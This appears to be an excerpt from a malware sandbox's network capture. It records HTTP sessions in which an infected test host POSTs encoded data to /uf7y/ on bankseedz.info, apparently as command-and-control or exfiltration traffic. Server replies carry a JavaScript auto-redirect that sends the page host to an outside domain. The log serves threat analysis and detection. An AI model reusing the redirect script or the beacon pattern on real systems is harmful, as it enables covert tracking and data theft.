                                                                            Dec 3, 2024 18:59:17.135812044 CET532INHTTP/1.1 200 OK
                                                                            Server: Apache
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Accept-Ranges: bytes
                                                                            Cache-Control: max-age=86400
                                                                            Age: 1
                                                                            Connection: Close
                                                                            Content-Length: 357
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 [TRUNCATED]
                                                                            Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>
                                                                            Dec 3, 2024 18:59:17.136059999 CET751OUTData Raw: 20 2f 6e 32 63 39 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 41 63 63 65 70 74 3a 20 74 65 78 74 2f 68 74 6d 6c 2c 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 68 74 6d 6c 2b 78 6d 6c 2c 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 6d 6c 3b 71 3d 30 2e 39 2c 69 6d
                                                                            Data Ascii: /n2c9/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflate, brCache-Control: no-ca


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            63192.168.11.204981623.225.159.4280
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:59:19.668977022 CET6OUTData Raw: 50 4f 53 54
                                                                            Data Ascii: POST
                                                                            Dec 3, 2024 18:59:19.855665922 CET532INHTTP/1.1 200 OK
                                                                            Server: Apache
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Accept-Ranges: bytes
                                                                            Cache-Control: max-age=86400
                                                                            Age: 1
                                                                            Connection: Close
                                                                            Content-Length: 357
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 [TRUNCATED]
                                                                            Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>
                                                                            Dec 3, 2024 18:59:19.855923891 CET771OUTData Raw: 20 2f 6e 32 63 39 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 41 63 63 65 70 74 3a 20 74 65 78 74 2f 68 74 6d 6c 2c 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 68 74 6d 6c 2b 78 6d 6c 2c 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 6d 6c 3b 71 3d 30 2e 39 2c 69 6d
                                                                            Data Ascii: /n2c9/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflate, brCache-Control: no-ca


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            64192.168.11.204981723.225.159.4280
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:59:22.387367964 CET6OUTData Raw: 50 4f 53 54
                                                                            Data Ascii: POST
                                                                            Dec 3, 2024 18:59:22.574327946 CET532INHTTP/1.1 200 OK
                                                                            Server: Apache
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Accept-Ranges: bytes
                                                                            Cache-Control: max-age=86400
                                                                            Age: 1
                                                                            Connection: Close
                                                                            Content-Length: 357
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 [TRUNCATED]
                                                                            Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>
                                                                            Dec 3, 2024 18:59:22.574650049 CET2578OUTData Raw: 20 2f 6e 32 63 39 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 41 63 63 65 70 74 3a 20 74 65 78 74 2f 68 74 6d 6c 2c 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 68 74 6d 6c 2b 78 6d 6c 2c 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 6d 6c 3b 71 3d 30 2e 39 2c 69 6d
                                                                            Data Ascii: /n2c9/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflate, brCache-Control: no-ca
                                                                            Dec 3, 2024 18:59:22.574721098 CET5342OUTData Raw: 5a 73 6d 2b 67 67 6a 39 71 55 56 59 38 6f 4f 46 68 37 32 68 67 50 6d 58 58 70 2b 72 72 33 5a 52 34 69 51 54 56 6a 71 63 4a 4d 55 4a 32 42 49 2f 5a 54 6f 43 54 43 6a 61 62 44 4e 43 45 52 57 4d 6f 55 39 30 79 6a 74 4f 42 6b 4d 6e 61 30 4d 4e 4d 4c
                                                                            Data Ascii: Zsm+ggj9qUVY8oOFh72hgPmXXp+rr3ZR4iQTVjqcJMUJ2BI/ZToCTCjabDNCERWMoU90yjtOBkMna0MNMLH5fYs9AwhBMgY3jGoV5RVZDyZuP1THFYhVJ7thHyXdJMRwHCuOfFQTl2jNZryRpd/gOsxIlPphoYURRWmGk1jeTX3oMDKCf6J/lv3Rqc/3/xFzwn5zMGGlxDvmjjEKG3SOH06Zo6eDJhP1T0jJHuoOMw4vNr3vRT8


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            65192.168.11.204981823.225.159.4280
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:59:25.104075909 CET6OUTGET
                                                                            Data Raw:
                                                                            Data Ascii:
                                                                            Dec 3, 2024 18:59:25.291847944 CET532INHTTP/1.1 200 OK
                                                                            Server: Apache
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Accept-Ranges: bytes
                                                                            Cache-Control: max-age=86400
                                                                            Age: 1
                                                                            Connection: Close
                                                                            Content-Length: 357
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 [TRUNCATED]
                                                                            Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>
                                                                            Dec 3, 2024 18:59:25.292212009 CET482OUTData Raw: 2f 6e 32 63 39 2f 3f 32 4f 3d 33 78 2f 37 66 34 6e 7a 55 76 66 34 53 73 6d 71 7a 46 6e 54 66 67 39 53 78 4d 4d 6d 45 69 6c 6f 5a 73 38 51 45 4f 61 47 65 43 6b 54 4b 32 41 65 31 4a 42 72 67 32 7a 37 51 69 72 6c 36 57 66 50 42 45 46 49 75 58 52 65
                                                                            Data Ascii: /n2c9/?2O=3x/7f4nzUvf4SsmqzFnTfg9SxMMmEiloZs8QEOaGeCkTK2Ae1JBrg2z7Qirl6WfPBEFIuXRetS7qNq3tJgV/JudJBWlXSOQ4g5lNoHOvpN8KebvqySaeOvo=&ChhG6=J-xs HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/a


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            66192.168.11.204981946.30.211.3880
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:59:30.744817019 CET761OUTPOST /uf7y/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 199
                                                                            Connection: close
                                                                            Host: www.bankseedz.info
                                                                            Origin: http://www.bankseedz.info
                                                                            Referer: http://www.bankseedz.info/uf7y/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Raw: 32 4f 3d 61 2b 2f 52 37 67 33 38 73 65 78 6f 6f 72 59 56 50 2b 49 38 54 31 4a 78 35 76 6f 44 78 6d 33 75 6e 6c 48 68 4e 6b 4c 36 6b 74 57 76 55 37 76 64 74 4a 4c 70 41 45 45 32 6d 45 48 58 50 77 67 66 41 6f 4b 62 6a 2b 4e 69 61 61 36 72 75 45 4d 66 31 4f 38 7a 36 59 70 4c 6e 65 53 58 4f 45 4a 43 47 51 45 2b 35 6d 67 44 39 51 66 42 58 35 7a 32 46 32 33 69 76 4f 31 4e 79 5a 67 68 64 6d 33 49 71 59 41 52 6d 6f 34 52 34 44 30 6d 4b 32 57 36 37 65 56 46 4a 4f 47 34 64 4b 76 79 5a 36 35 6f 72 33 56 54 59 6a 6e 4c 61 68 39 46 6e 6d 72 73 39 6d 46 34 70 6e 49 32 42 66 6b 47 4e 43 6f 58 71 41 3d 3d
                                                                            Data Ascii: 2O=a+/R7g38sexoorYVP+I8T1Jx5voDxm3unlHhNkL6ktWvU7vdtJLpAEE2mEHXPwgfAoKbj+Niaa6ruEMf1O8z6YpLneSXOEJCGQE+5mgD9QfBX5z2F23ivO1NyZghdm3IqYARmo4R4D0mK2W67eVFJOG4dKvyZ65or3VTYjnLah9Fnmrs9mF4pnI2BfkGNCoXqA==
                                                                            Dec 3, 2024 18:59:30.997912884 CET738INHTTP/1.1 404 Not Found
                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                            Date: Tue, 03 Dec 2024 17:59:30 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Content-Length: 564
                                                                            Connection: close
                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            67192.168.11.204982046.30.211.3880
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:59:33.511087894 CET781OUTPOST /uf7y/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 219
                                                                            Connection: close
                                                                            Host: www.bankseedz.info
                                                                            Origin: http://www.bankseedz.info
                                                                            Referer: http://www.bankseedz.info/uf7y/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Raw: 32 4f 3d 61 2b 2f 52 37 67 33 38 73 65 78 6f 35 2b 49 56 63 4a 30 38 53 56 4a 79 32 50 6f 44 6d 32 33 31 6e 6c 37 68 4e 68 7a 55 6e 62 6d 76 55 62 66 64 73 49 4c 70 4f 6b 45 32 31 45 48 57 58 51 67 41 41 6f 50 6d 6a 2b 78 69 61 61 75 72 75 42 6f 66 31 39 55 77 72 59 70 4a 76 2b 53 56 4b 45 4a 43 47 51 45 2b 35 6d 6c 4c 39 51 48 42 58 49 44 32 58 45 66 6a 7a 65 31 4f 7a 5a 67 68 5a 6d 32 67 71 59 41 2f 6d 70 6b 33 34 46 77 6d 4b 7a 53 36 37 72 70 4b 65 65 47 45 5a 4b 75 57 55 61 45 4b 6b 48 31 62 53 67 4f 59 64 6a 68 59 6d 77 6d 32 67 55 78 63 71 30 55 45 46 76 64 75 50 41 70 4d 33 47 52 6a 65 49 4d 30 2b 4e 32 4d 65 5a 4c 36 39 33 55 58 2f 6b 6b 3d
                                                                            Data Ascii: 2O=a+/R7g38sexo5+IVcJ08SVJy2PoDm231nl7hNhzUnbmvUbfdsILpOkE21EHWXQgAAoPmj+xiaauruBof19UwrYpJv+SVKEJCGQE+5mlL9QHBXID2XEfjze1OzZghZm2gqYA/mpk34FwmKzS67rpKeeGEZKuWUaEKkH1bSgOYdjhYmwm2gUxcq0UEFvduPApM3GRjeIM0+N2MeZL693UX/kk=
                                                                            Dec 3, 2024 18:59:33.749625921 CET738INHTTP/1.1 404 Not Found
                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                            Date: Tue, 03 Dec 2024 17:59:33 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Content-Length: 564
                                                                            Connection: close
                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            68192.168.11.204982146.30.211.3880
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:59:36.295120001 CET2578OUTPOST /uf7y/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 7367
                                                                            Connection: close
                                                                            Host: www.bankseedz.info
                                                                            Origin: http://www.bankseedz.info
                                                                            Referer: http://www.bankseedz.info/uf7y/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Raw: 32 4f 3d 61 2b 2f 52 37 67 33 38 73 65 78 6f 35 2b 49 56 63 4a 30 38 53 56 4a 79 32 50 6f 44 6d 32 33 31 6e 6c 37 68 4e 68 7a 55 6e 59 47 76 55 6f 6e 64 71 72 7a 70 4e 6b 45 32 32 45 48 54 58 51 67 4a 41 6f 32 74 6a 2b 38 41 61 5a 57 72 75 6e 30 66 6b 38 55 77 69 59 70 4a 6a 65 53 49 4f 45 4a 58 47 51 55 69 35 6c 4e 4c 39 51 48 42 58 4b 62 32 48 47 33 6a 78 65 31 4e 79 5a 67 6c 64 6d 32 62 71 59 59 4a 6d 70 78 4d 35 31 51 6d 4b 54 69 36 35 35 42 4b 64 2b 47 38 65 4b 75 4f 55 61 49 38 6b 48 70 68 53 68 37 46 64 67 42 59 6e 52 44 48 33 52 51 48 33 79 51 75 50 39 39 56 4d 57 6b 61 77 33 51 64 56 4f 51 59 30 59 47 6c 65 36 4c 6e 6d 44 6f 58 72 7a 55 35 45 73 57 59 47 6c 64 64 38 2f 69 5a 69 7a 36 79 7a 30 6c 4e 32 2f 50 66 76 79 69 56 6c 79 6f 4f 59 7a 42 39 70 67 46 63 46 75 77 44 42 58 6e 33 4e 46 4c 69 68 37 46 59 4a 2f 68 4e 34 79 74 52 34 46 30 39 47 64 41 59 62 2f 52 68 56 72 71 61 56 44 73 41 52 32 75 55 48 55 47 56 32 47 69 68 49 4c 4d 69 30 53 31 70 72 57 49 6b 78 46 52 52 66 74 6a 42 61 49 35 [TRUNCATED]
                                                                            Data Ascii: 2O=a+/R7g38sexo5+IVcJ08SVJy2PoDm231nl7hNhzUnYGvUondqrzpNkE22EHTXQgJAo2tj+8AaZWrun0fk8UwiYpJjeSIOEJXGQUi5lNL9QHBXKb2HG3jxe1NyZgldm2bqYYJmpxM51QmKTi655BKd+G8eKuOUaI8kHphSh7FdgBYnRDH3RQH3yQuP99VMWkaw3QdVOQY0YGle6LnmDoXrzU5EsWYGldd8/iZiz6yz0lN2/PfvyiVlyoOYzB9pgFcFuwDBXn3NFLih7FYJ/hN4ytR4F09GdAYb/RhVrqaVDsAR2uUHUGV2GihILMi0S1prWIkxFRRftjBaI5NlMtsTxL80LGa9XfZodUUKAw9wecK0G6Bhl1vMaxm5glg3RDBvZplqHDNBZsVUkHBYd2+F0oaunxUkn44eiT8FRFCZmGAA3637UlJDr0HUJqr45BKAtUkb95M3tqJ5OSeFzn2lbmYJw+Jkk1CMX+KRhqP68QexGyIKvF4tzf28lO3Q4bknuSfPv5Psv/sSKG8tJB1WGwX2VtuSCVsHwl1yCbbl4pDK40QJ0rVRio/RHS8NMTHCVdMrwd8aBf+21eea8ZCIbKkXnmVJIaY925vYAhZZmAFqDEzag+xuIWhtJDVGKm1HO3H5PLC1ZjBvNvsN3GFdfPjSQu9CaDmgt5VRBZe5+r5KizFYBbbvnwqaICf0fJncqUBQfm9O78vy8gKStIPt/ub8FhQNua2BY4p+SLTCvb9jHZVg7wLInFYPBDK1qjN7Y7Q1EsRwZuRj882cpymHvZyGGoOnZMOMTkYCwHeiZs4xYdRjFcme4Bqtvx5cnncFKWdOVt25NXUqtxD/LoCGQQe1hvVxGo9sI1AwvH2I7LdfzMOHR24HYRYc+RLJXSevKocgKX6Kr4U6JF8MKD9dzQQnI+EnvRaxAwPVtdP7+HwVCCa6kUa04XFtOXlHKbqI8OYdRKCcJXQ972JFrYFQ4bLB3RYnvpyigq3Db8pxP63dS3a6 [TRUNCATED]
                                                                            Dec 3, 2024 18:59:36.295198917 CET5352OUTData Raw: 61 46 4f 63 7a 2f 61 73 7a 76 43 47 45 4c 66 67 76 35 52 48 6c 4d 74 2b 39 66 6c 4b 72 58 50 6c 69 4b 64 4c 31 4a 4f 62 39 45 2b 4e 5a 4c 31 6f 57 59 69 65 75 6f 79 42 7a 79 45 45 55 4b 4c 69 42 68 70 71 6c 39 61 78 66 6f 65 72 56 62 33 6b 44 55
                                                                            Data Ascii: aFOcz/aszvCGELfgv5RHlMt+9flKrXPliKdL1JOb9E+NZL1oWYieuoyBzyEEUKLiBhpql9axfoerVb3kDUbvjQoEvpQYQbWNj1eaWR75i4mzsF3XEEUBbDfJ7SNXJ6vKbhjepBEMIyADgbJFwws1XfGO0KALshh7YoHukS2bFEFNVlTi9vOX67BUhOQXEXrXlbLSEjnX6oU1cKq13YEUsEKM69xh1jKDF4Brh6geVfKakDKxABW
                                                                            Dec 3, 2024 18:59:36.547761917 CET738INHTTP/1.1 404 Not Found
                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                            Date: Tue, 03 Dec 2024 17:59:36 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Content-Length: 564
                                                                            Connection: close
